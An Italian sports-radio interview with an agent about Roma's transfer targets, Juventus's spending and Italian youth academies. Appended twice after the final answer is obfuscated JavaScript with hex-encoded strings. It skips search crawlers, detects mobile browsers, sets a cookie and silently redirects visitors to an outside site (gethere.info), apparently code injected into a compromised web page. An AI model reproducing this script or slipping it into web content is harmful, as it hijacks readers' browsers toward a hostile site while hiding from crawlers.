Simone Canovi a Centro Suono Sport: “Kolasinac è un giocatore duttile e affidabile. La Roma ha una rosa importante e il campionato non è chiuso”

canovi

Le dichiarazioni di Simone Canovi, agente FIFA, in esclusiva ai microfoni di Centro Suono Sport 101.500.

Che giocatore è Kolasinac?
“E’ un giocatore che ha alcuni difetti però ha un pregio: la duttilità. E’ uno di quelli che ti da una certa affidabilità, in questo momento in cui purtroppo ci si concentrava su altri ruoli e ti ritrovi a doverne cercare altri devi lavorare con la fantasia.”

Può giocare nella difesa a tre?
“Si, anche se non la vedo probabile come cosa quella di giocare a tre. Anche se sicuramente è uno dei moduli che il mister sta provando.”

Aogo:
“E’ una situazione diversa sia per ruolo che per possibilità di utilizzo. Aogo è uno specialista nel suo ruolo rispetto a Kolasinac. A me Aogo è un giocatore che piace più di Kolasinac. E’ un calciatore che si rende più utile in entrambe le fasi.”

Darmian:
“Era titolare fisso quando è stato acquistato dal Manchester United, o almeno questo era nelle idee della società acquirente. E’ giovane ed è stato vittima della cecità di alcune società italiane. Ci siamo accorti di lui solo quando lo ha acquistato il Manchester United. E’ un calciatore estremamente importante, bravo difensivamente e nell’accompagnare l’azione.”

Parlando di centrali difensivi. Federico Fazio:
“E’ un giocatore che è stato vittima di alcuni infortuni, era uno di quei nomi che circolavano spesso per le grandissime squadre. Gli infortuni ne hanno limitato lo sviluppo. E’ interessante ma è un punto interrogativo a causa della quantità di infortuni. Lo stesso discorso lo si può fare per Caceres. Uno dei vantaggi di Fazio è la sua duttilità.”

Guardando la campagna acquisti della Juventus pensi che sia un campionato già chiuso?
“Una finestra la lascio aperta. E’ ovvio che se ti trovi di fronte una squadra che ha vinto cinque scudetti di fila e che compra nell’ordine Dani Alves, Pjanic, Benatia, Pjaca e probabilmente Gabigol la prima cosa che pensi è quella di partecipare ad un altro torneo. Tutto fa pensare che sia impossibile raggiungerli ma è anche vero che quando siamo partiti sulla carta alla pari non ce l’abbiamo fatta, non è detto che non partendo alla pari la Roma non ce la possa fare. Nonostante le difficoltà e la perdita di un giocatore come Pjanic, credo che la Roma parta da una rosa importante; inoltre sta lavorando con intelligenza e attenzione. Aspettiamo la fine del mercato, abbiamo un allenatore superiore alla media e la società sta lavorando come si deve lavorare in un momento come questo. Sono un’ottimista di natura, non considero il mercato chiuso.”

90 milioni della Juventus per Higuain, 40 del Manchester United per Bailly. Poi si parla dei 120 milioni per Pogba, degli 80 si dice del Chelsea per Lukaku e dei 55 del City per Sané. Qual è la follia più grande di mercato fatta finora?
“Non sono grandi follie dal punto di vista tecnico. E’ sintomo che il mercato in Europa si sta risvegliando, anche in Italia stessa perché Higuain alla Juve per 90 milioni è un segnale importante per tutto il movimento. Vediamo, i segnali ci sono per un risveglio del calcio in Europa.”

Lo sviluppo calcio italiano. Cosa deve fare l’Italia per raggiungere il livello di Germania, Spagna e Francia?
“Parliamo di nazioni che quando hanno toccato il fondo hanno fatto muovere il cervello e hanno deciso come provare a rimettere in sesto il movimento nel proprio paese. La Francia, dopo il Mondiale vinto in casa, ha passato qualche anno buio, poi ha ripreso a lavorare fortemente col settore giovanile investendo tantissimo soldi. Non comprando i giocatori ma investendo nel movimento. La stessa cosa hanno fatto in Spagna e in Germania. In Italia è dal Mondiale in Sudafrica che si parla del calcio italiano in difficoltà e dei vivai che non producono giocatori. Rispetto ad allora, mi sembra che le squadre che creano giocatori italiani che possono permettersi di essere accostati alla nazionale italiana sono sempre le stesse: Atalanta, Roma e poche altre. Noi ne parliamo, ma non facciamo. Ne parliamo ormai da un decennio. Prima era diverso. Si dice che il campionato francese sia di secondo livello. E’ una sciocchezza. Il campionato francese, è vero che ha il Psg che ha risorse diverse rispetto non solo alle squadre della propria nazione ma alle squadre di tutto il mondo, ma vai a vedere che gioca col terzino sinistro del ’97, col difensore centrale del ’95, sia in Serie A che in Serie B. Giocatori che a venti anni già fanno 30-40-50 presenze nella serie maggiore del proprio paese. Stessa cosa in Spagna, in Germania e in Inghilterra. Se vedete la prima squadra dell’Everton controllate l’età di Stones e di Galloway. Vi rendete conto che sono squadre che non hanno paura a tirare fuori giocatori che si sono costruiti e su cui hanno investito. E’ lì la differenza. E’ ovvio che il campionato italiano è diverso, perché c’è un tatticismo esasperato e altri mille motivi. La differenza sta tutta lì.”

Perché prima in Italia si gestivano diversamente i vivai?
“Penso che sia dovuto alla “pancia piena”. C’è stato un rilassamento generale del movimento. Tanti hanno pensato “tanto i giocatori italiani vengono fuori” ma i giocatori prima venivano fuori perché c’erano società che li creavano. Oggi li creano Roma, Atalanta e Juventus. In passato mi ricordo che erano anche squadre delle serie inferiori che li tiravano fuori, come la Lodigiani. Quando ho iniziato a fare questo lavoro, venti anni fa, nella classifica delle squadre da cui si estrapolavano i diritti di formazione, soprattutto per quelli che erano gli eventuali rapimenti da parte delle società estere, c’era una tabella di squadre: la prima era l’Atalanta, la seconda la Roma e la terza la Lodigiani. La Lodigiani giocava in Serie C e ha tirato fuori giocatori come Luca Toni, Alessandro Sgrigna e altri. Era diverso. Oggi i settori giovanili delle squadre di Serie A e Serie B, tranne per quelle che ho citato prima, ridotti se non ridottissimi. Ci sono società che si disinteressano al settore giovanile. Mi viene in mente il Napoli che non sfrutta i giocatori interessanti che ha. In Lega Pro si punta a portare gente che porta i soldi per sostenere il peso del settore giovanile. I settori giovanili vengono dati a chi porta i soldi.”

Due nomi a sorpresa per i ruoli in cui la Roma è scoperta?
“Uno potrebbe essere Pavard, terzino sinistro destro di piede. Gioca anche difensore centrale e potrebbe fare anche il terzino destro. E’ il prototipo del jolly, classe 1995 e ne sentiremo parlare. Per gli altri ruoli è difficile. Alla Roma serve un duttile. Anche i difensori che cerca la Roma dovranno avere una capacità di adattamento.”var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}